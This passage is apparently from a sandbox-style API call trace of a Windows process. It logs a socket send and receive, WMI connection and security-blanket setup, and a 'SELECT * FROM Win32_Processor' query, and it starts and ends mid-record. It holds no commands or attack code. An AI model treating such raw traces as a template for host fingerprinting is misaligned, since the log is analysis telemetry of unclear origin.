ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0268.194] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19f264) returned 1 [0268.198] CoCreateGuid (in: pguid=0x19efd4 | out: pguid=0x19efd4*(Data1=0x83a1269f, Data2=0x1f84, Data3=0x477a, Data4=([0]=0x95, [1]=0x97, [2]=0x95, [3]=0x74, [4]=0xfb, [5]=0x2c, [6]=0xf5, [7]=0x40))) returned 0x0 [0268.199] CoCreateGuid (in: pguid=0x19ef04 | out: pguid=0x19ef04*(Data1=0x9cea2f1e, Data2=0x127b, Data3=0x4daa, Data4=([0]=0x9b, [1]=0xe4, [2]=0x26, [3]=0x28, [4]=0x3f, [5]=0x72, [6]=0x71, [7]=0x88))) returned 0x0 [0268.199] send (s=0x348, buf=0x211a2ef*, len=167, flags=0) returned 167 [0268.200] recv (in: s=0x348, buf=0x211b490, len=8192, flags=0 | out: buf=0x211b490*) returned 132 [0268.257] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f274 | out: puCount=0x19f274*=0x2) returned 0x0 [0268.257] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f270*=0x0, pszText=0x0 | out: puBuffLength=0x19f270*=0xf, pszText=0x0) returned 0x0 [0268.257] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f270*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f270*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0268.258] CoGetObjectContext (in: riid=0x217d1c8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f200 | out: ppv=0x19f200*=0x601a94) returned 0x0 [0268.258] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1f8 | out: pAptType=0x19f1f8*=1) returned 0x0 [0268.258] IUnknown:QueryInterface (in: This=0x601a94, riid=0x217d1b0*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1fc | out: ppvObject=0x19f1fc*=0x0) returned 0x80004002 [0268.258] IUnknown:Release (This=0x601a94) returned 0x1 [0268.259] CoGetClassObject (in: rclsid=0x6bdd2c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19ee20 | out: ppv=0x19ee20*=0x5544f60) returned 0x0 [0268.260] WbemLocator:IUnknown:QueryInterface (in: This=0x5544f60, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19f038 | out: ppvObject=0x19f038*=0x0) returned 0x80004002 [0268.260] WbemLocator:IClassFactory:CreateInstance (in: This=0x5544f60, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f04c | out: ppvObject=0x19f04c*=0x54ba4f8) returned 0x0 [0268.260] WbemLocator:IUnknown:Release (This=0x5544f60) returned 0x0 [0268.260] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4f8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec6c | out: ppvObject=0x19ec6c*=0x54ba4f8) returned 0x0 [0268.260] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4f8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec28 | out: ppvObject=0x19ec28*=0x0) returned 0x80004002 [0268.260] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4f8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e81c | out: ppvObject=0x19e81c*=0x0) returned 0x80004002 [0268.260] WbemLocator:IUnknown:AddRef (This=0x54ba4f8) returned 0x3 [0268.260] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4f8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e584 | out: ppvObject=0x19e584*=0x0) returned 0x80004002 [0268.260] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4f8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e534 | out: ppvObject=0x19e534*=0x0) returned 0x80004002 [0268.260] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4f8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e540 | out: ppvObject=0x19e540*=0x0) returned 0x80004002 [0268.261] CoGetContextToken (in: pToken=0x19e5a0 | out: pToken=0x19e5a0) returned 0x0 [0268.261] CoGetContextToken (in: pToken=0x19e9a8 | out: pToken=0x19e9a8) returned 0x0 [0268.261] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4f8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea38 | out: ppvObject=0x19ea38*=0x0) returned 0x80004002 [0268.261] WbemLocator:IUnknown:Release (This=0x54ba4f8) returned 0x2 [0268.261] WbemLocator:IUnknown:Release (This=0x54ba4f8) returned 0x1 [0268.261] CoGetContextToken (in: pToken=0x19f018 | out: pToken=0x19f018) returned 0x0 [0268.261] CoGetContextToken (in: pToken=0x19ef78 | out: pToken=0x19ef78) returned 0x0 [0268.261] WbemLocator:IUnknown:QueryInterface (in: This=0x54ba4f8, riid=0x19f048*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19f044 | out: ppvObject=0x19f044*=0x54ba4f8) returned 0x0 [0268.261] WbemLocator:IUnknown:AddRef (This=0x54ba4f8) returned 0x3 [0268.261] WbemLocator:IUnknown:Release (This=0x54ba4f8) returned 0x2 [0268.261] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1dc | out: puCount=0x19f1dc*=0x2) returned 0x0 [0268.261] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=8, puBuffLength=0x19f1d8*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d8*=0xf, pszText=0x0) returned 0x0 [0268.261] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=8, puBuffLength=0x19f1d8*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0268.261] CoCreateInstance (in: rclsid=0x6d3c1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d3c12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x19f0b4 | out: ppv=0x19f0b4*=0x54ba3c8) returned 0x0 [0268.261] WbemLocator:IWbemLocator:ConnectServer (in: This=0x54ba3c8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x19f148 | out: ppNamespace=0x19f148*=0x54b54a0) returned 0x0 [0268.294] WbemLocator:IUnknown:QueryInterface (in: This=0x54b54a0, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efe4 | out: ppvObject=0x19efe4*=0x66f24c) returned 0x0 [0268.294] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x66f24c, pProxy=0x54b54a0, pAuthnSvc=0x19f034, pAuthzSvc=0x19f030, pServerPrincName=0x19f028, pAuthnLevel=0x19f02c, pImpLevel=0x19f01c, pAuthInfo=0x19f020, pCapabilites=0x19f024 | out: pAuthnSvc=0x19f034*=0xa, pAuthzSvc=0x19f030*=0x0, pServerPrincName=0x19f028, pAuthnLevel=0x19f02c*=0x6, pImpLevel=0x19f01c*=0x2, pAuthInfo=0x19f020, pCapabilites=0x19f024*=0x1) returned 0x0 [0268.294] WbemLocator:IUnknown:Release (This=0x66f24c) returned 0x1 [0268.295] WbemLocator:IUnknown:QueryInterface (in: This=0x54b54a0, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efd8 | out: ppvObject=0x19efd8*=0x66f270) returned 0x0 [0268.295] WbemLocator:IUnknown:QueryInterface (in: This=0x54b54a0, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efd4 | out: ppvObject=0x19efd4*=0x66f24c) returned 0x0 [0268.295] WbemLocator:IClientSecurity:SetBlanket (This=0x66f24c, pProxy=0x54b54a0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0268.295] WbemLocator:IUnknown:Release (This=0x66f24c) returned 0x2 [0268.295] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x1 [0268.295] CoTaskMemFree (pv=0x54bc3b8) [0268.295] WbemLocator:IUnknown:Release (This=0x54ba3c8) returned 0x0 [0268.295] WbemLocator:IUnknown:QueryInterface (in: This=0x54b54a0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ebd4 | out: ppvObject=0x19ebd4*=0x66f270) returned 0x0 [0268.295] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19eb90 | out: ppvObject=0x19eb90*=0x0) returned 0x80004002 [0268.296] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e9ac | out: ppvObject=0x19e9ac*=0x0) returned 0x80004002 [0268.296] WbemLocator:IUnknown:QueryInterface (in: This=0x54b54a0, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e784 | out: ppvObject=0x19e784*=0x0) returned 0x80004002 [0268.297] WbemLocator:IUnknown:AddRef (This=0x66f270) returned 0x3 [0268.297] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e4ec | out: ppvObject=0x19e4ec*=0x0) returned 0x80004002 [0268.297] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e49c | out: ppvObject=0x19e49c*=0x0) returned 0x80004002 [0268.297] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4a8 | out: ppvObject=0x19e4a8*=0x66f1cc) returned 0x0 [0268.297] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66f1cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e4b0 | out: pCid=0x19e4b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0268.297] WbemLocator:IUnknown:Release (This=0x66f1cc) returned 0x3 [0268.297] CoGetContextToken (in: pToken=0x19e508 | out: pToken=0x19e508) returned 0x0 [0268.297] CoGetContextToken (in: pToken=0x19e910 | out: pToken=0x19e910) returned 0x0 [0268.297] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e9a0 | out: ppvObject=0x19e9a0*=0x66f254) returned 0x0 [0268.297] WbemLocator:IRpcOptions:Query (in: This=0x66f254, pPrx=0x66f270, dwProperty=2, pdwValue=0x19e9c8 | out: pdwValue=0x19e9c8) returned 0x80004002 [0268.297] WbemLocator:IUnknown:Release (This=0x66f254) returned 0x3 [0268.297] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x2 [0268.297] CoGetContextToken (in: pToken=0x19eee8 | out: pToken=0x19eee8) returned 0x0 [0268.297] CoGetContextToken (in: pToken=0x19ee48 | out: pToken=0x19ee48) returned 0x0 [0268.297] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x19ef18*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x19ef14 | out: ppvObject=0x19ef14*=0x54b54a0) returned 0x0 [0268.297] WbemLocator:IUnknown:AddRef (This=0x54b54a0) returned 0x4 [0268.297] WbemLocator:IUnknown:Release (This=0x54b54a0) returned 0x3 [0268.297] WbemLocator:IUnknown:Release (This=0x54b54a0) returned 0x2 [0268.298] SysStringLen (param_1=0x0) returned 0x0 [0268.298] CoGetContextToken (in: pToken=0x19eee0 | out: pToken=0x19eee0) returned 0x0 [0268.298] WbemLocator:IUnknown:AddRef (This=0x66f270) returned 0x3 [0268.298] WbemLocator:IUnknown:QueryInterface (in: This=0x66f270, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x66f270) returned 0x0 [0268.298] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x3 [0268.298] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x2 [0268.298] CoGetContextToken (in: pToken=0x19efd8 | out: pToken=0x19efd8) returned 0x0 [0268.298] WbemLocator:IUnknown:AddRef (This=0x54b54a0) returned 0x3 [0268.298] IWbemServices:ExecQuery (in: This=0x54b54a0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Processor", lFlags=16, pCtx=0x0, ppEnum=0x19f1e4 | out: ppEnum=0x19f1e4*=0x663848) returned 0x0 [0268.369] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f048 | out: ppvObject=0x19f048*=0x66384c) returned 0x0 [0268.369] IClientSecurity:QueryBlanket (in: This=0x66384c, pProxy=0x663848, pAuthnSvc=0x19f098, pAuthzSvc=0x19f094, pServerPrincName=0x19f08c, pAuthnLevel=0x19f090, pImpLevel=0x19f080, pAuthInfo=0x19f084, pCapabilites=0x19f088 | out: pAuthnSvc=0x19f098*=0xa, pAuthzSvc=0x19f094*=0x0, pServerPrincName=0x19f08c, pAuthnLevel=0x19f090*=0x6, pImpLevel=0x19f080*=0x2, pAuthInfo=0x19f084, pCapabilites=0x19f088*=0x1) returned 0x0 [0268.369] IUnknown:Release (This=0x66384c) returned 0x1 [0268.369] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f03c | out: ppvObject=0x19f03c*=0x66ea70) returned 0x0 [0268.369] IUnknown:QueryInterface (in: This=0x663848, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f038 | out: ppvObject=0x19f038*=0x66384c) returned 0x0 [0268.369] IClientSecurity:SetBlanket (This=0x66384c, pProxy=0x663848, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0268.371] IUnknown:Release (This=0x66384c) returned 0x2 [0268.371] WbemLocator:IUnknown:Release (This=0x66ea70) returned 0x1 [0268.371] CoTaskMemFree (pv=0x54bc448) [0268.371] IUnknown:QueryInterface (in: This=0x663848, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ec34 | out: ppvObject=0x19ec34*=0x66ea70) returned 0x0 [0268.371] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ebf0 | out: ppvObject=0x19ebf0*=0x0) returned 0x80004002 [0268.372] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ea0c | out: ppvObject=0x19ea0c*=0x0) returned 0x80004002 [0268.372] IUnknown:QueryInterface (in: This=0x663848, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e7e4 | out: ppvObject=0x19e7e4*=0x0) returned 0x80004002 [0268.372] WbemLocator:IUnknown:AddRef (This=0x66ea70) returned 0x3 [0268.372] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e54c | out: ppvObject=0x19e54c*=0x0) returned 0x80004002 [0268.372] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e4fc | out: ppvObject=0x19e4fc*=0x0) returned 0x80004002 [0268.372] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e508 | out: ppvObject=0x19e508*=0x66e9cc) returned 0x0 [0268.373] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x66e9cc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e510 | out: pCid=0x19e510*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0268.373] WbemLocator:IUnknown:Release (This=0x66e9cc) returned 0x3 [0268.373] CoGetContextToken (in: pToken=0x19e568 | out: pToken=0x19e568) returned 0x0 [0268.373] CoGetContextToken (in: pToken=0x19e970 | out: pToken=0x19e970) returned 0x0 [0268.373] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ea00 | out: ppvObject=0x19ea00*=0x66ea54) returned 0x0 [0268.373] WbemLocator:IRpcOptions:Query (in: This=0x66ea54, pPrx=0x66ea70, dwProperty=2, pdwValue=0x19ea28 | out: pdwValue=0x19ea28) returned 0x80004002 [0268.373] WbemLocator:IUnknown:Release (This=0x66ea54) returned 0x3 [0268.373] WbemLocator:IUnknown:Release (This=0x66ea70) returned 0x2 [0268.373] CoGetContextToken (in: pToken=0x19ef48 | out: pToken=0x19ef48) returned 0x0 [0268.373] CoGetContextToken (in: pToken=0x19eea8 | out: pToken=0x19eea8) returned 0x0 [0268.373] WbemLocator:IUnknown:QueryInterface (in: This=0x66ea70, riid=0x19ef78*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19ef74 | out: ppvObject=0x19ef74*=0x663848) returned 0x0 [0268.373] IUnknown:AddRef (This=0x663848) returned 0x4 [0268.373] IUnknown:Release (This=0x663848) returned 0x3 [0268.373] IUnknown:Release (This=0x663848) returned 0x2 [0268.373] WbemLocator:IUnknown:Release (This=0x54b54a0) returned 0x2 [0268.373] SysStringLen (param_1=0x0) returned 0x0 [0268.373] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f230 | out: puCount=0x19f230*=0x2) returned 0x0 [0268.374] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f22c*=0x0, pszText=0x0 | out: puBuffLength=0x19f22c*=0xf, pszText=0x0) returned 0x0 [0268.374] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f22c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f22c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0268.374] CoGetContextToken (in: pToken=0x19f080 | out: pToken=0x19f080) returned 0x0 [0268.374] IUnknown:AddRef (This=0x663848) returned 0x3 [0268.374] IEnumWbemClassObject:Clone (in: This=0x663848, ppEnum=0x19f23c | out: ppEnum=0x19f23c*=0x6636b8) returned 0x0 [0268.377] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f100 | out: ppvObject=0x19f100*=0x6636bc) returned 0x0 [0268.377] IClientSecurity:QueryBlanket (in: This=0x6636bc, pProxy=0x6636b8, pAuthnSvc=0x19f150, pAuthzSvc=0x19f14c, pServerPrincName=0x19f144, pAuthnLevel=0x19f148, pImpLevel=0x19f138, pAuthInfo=0x19f13c, pCapabilites=0x19f140 | out: pAuthnSvc=0x19f150*=0xa, pAuthzSvc=0x19f14c*=0x0, pServerPrincName=0x19f144, pAuthnLevel=0x19f148*=0x6, pImpLevel=0x19f138*=0x2, pAuthInfo=0x19f13c, pCapabilites=0x19f140*=0x1) returned 0x0 [0268.377] IUnknown:Release (This=0x6636bc) returned 0x1 [0268.377] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6d3c10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0f4 | out: ppvObject=0x19f0f4*=0x66fb70) returned 0x0 [0268.377] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6d3c1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19f0f0 | out: ppvObject=0x19f0f0*=0x6636bc) returned 0x0 [0268.377] IClientSecurity:SetBlanket (This=0x6636bc, pProxy=0x6636b8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0268.379] IUnknown:Release (This=0x6636bc) returned 0x2 [0268.379] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x1 [0268.379] CoTaskMemFree (pv=0x54bc448) [0268.379] IUnknown:QueryInterface (in: This=0x6636b8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ecdc | out: ppvObject=0x19ecdc*=0x66fb70) returned 0x0 [0268.379] WbemLocator:IUnknown:QueryInterface (in: This=0x66fb70, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19ec98 | out: ppvObject=0x19ec98*=0x0) returned 0x80004002 [0268.379] 